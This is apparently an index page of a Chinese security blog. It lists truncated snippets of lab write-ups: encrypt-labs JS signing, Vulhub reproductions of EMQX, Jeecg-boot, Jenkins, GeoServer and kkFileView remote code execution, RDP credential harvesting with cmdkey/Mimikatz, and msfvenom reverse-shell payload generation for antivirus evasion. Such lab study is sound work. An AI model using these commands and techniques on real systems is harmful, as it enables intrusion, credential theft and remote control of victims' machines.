v_jstool、JsRpc、autoDecoder进行自动加解密 encrypt-labs-js 完成该文章主要是通过看到一个JS相关文章,然后自己的js比较薄弱,然后想着照着学一遍并进行实现。 测试网站
Emqx后台插件命令执行漏洞 漏洞复现 影响版本 漏洞影响版本:5.8.6 版本以前 环境搭建 使用docker进行启动: docker pull emqx/emqx-enterprise:5.5.1 docker run -d --name emqx-enterprise -p 1883:1883 -p 8083:8083 -p 808
encrypt-labs 明文加签(easy版) encrypt-labs-js 选择明文加签进行登录后,修改密码时就会报类似签名不正确。 先查看原请求包: 修改密码后再进行发送请求:(报签名不正确) 这时如果我们想进行爆破的话就需要知道签名是怎么生成的,这时我们可以定位js提交数据的位置然后设置断点。
encrypt-labs靶场搭建 encrypt-labs-js 靶场下载 靶场下载地址: https://github.com/SwagXz/encrypt-labs 这里选择使用docker进行搭建靶场: git clone https://github.com/Ta0ing/encrypt-labs-docker.git 下载好之后就是启动靶场 docker
Jeecg-boot漏洞复现模板注入命令执行 漏洞复现 CVE-2023-4450(queryFieldBySql) 漏洞搭建 漏洞搭建使用Vulhub:vulhub/jeecg-boot/CVE-2023-4450 漏洞复现 靶场启动后访问8080端口 相关接口: /jeecg-boot/jmreport/list` 查看JimuReport页面 /j
Jenkins后台内存马注入及相关命令 漏洞复现 漏洞搭建 通过Vulhub进行漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897 账号/密码:admin/vulhub WEB服务端口8080 漏洞复现 内存马注入 通过账号密码登录后台,找到Scrip
GeoServer(CVE-2024-36401)漏洞复现 漏洞复现 漏洞环境 漏洞搭建使用vulhub,https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 影响版本 在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前。 漏洞复现 环境均为自行搭建 靶场j
kkFileView-RCE漏洞复现 漏洞复现 漏洞影响版本 kkFileView 4.4.0-beta以前 漏洞搭建 使用vulhub进行漏洞环境搭建 Kali IP & 目标 IP :192.168.88.206 漏洞复现 命令执行 方法:利用poc.py生成一个恶意的zip文件,并创建一个.odt文件。
Windows-RDP-Mimikatz凭证横向 Windows 横向过程 前提是主机上保存过RDP凭证,查看命令(Administrator管理员权限): cmdkey /list 第一步:查看凭证 查看凭证文件所在位置,命令: dir /a %USERPROFILE%\AppData\Local\Microsof
MSF-Java-免杀初体验 免杀 前言 公众号看到的文章,说生成的jar包来上线机器,C看不懂java利用AI还可以看吧。 生成SHELL 利用kali生成反弹shell的JAR包: 命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.88.206 LPORT=444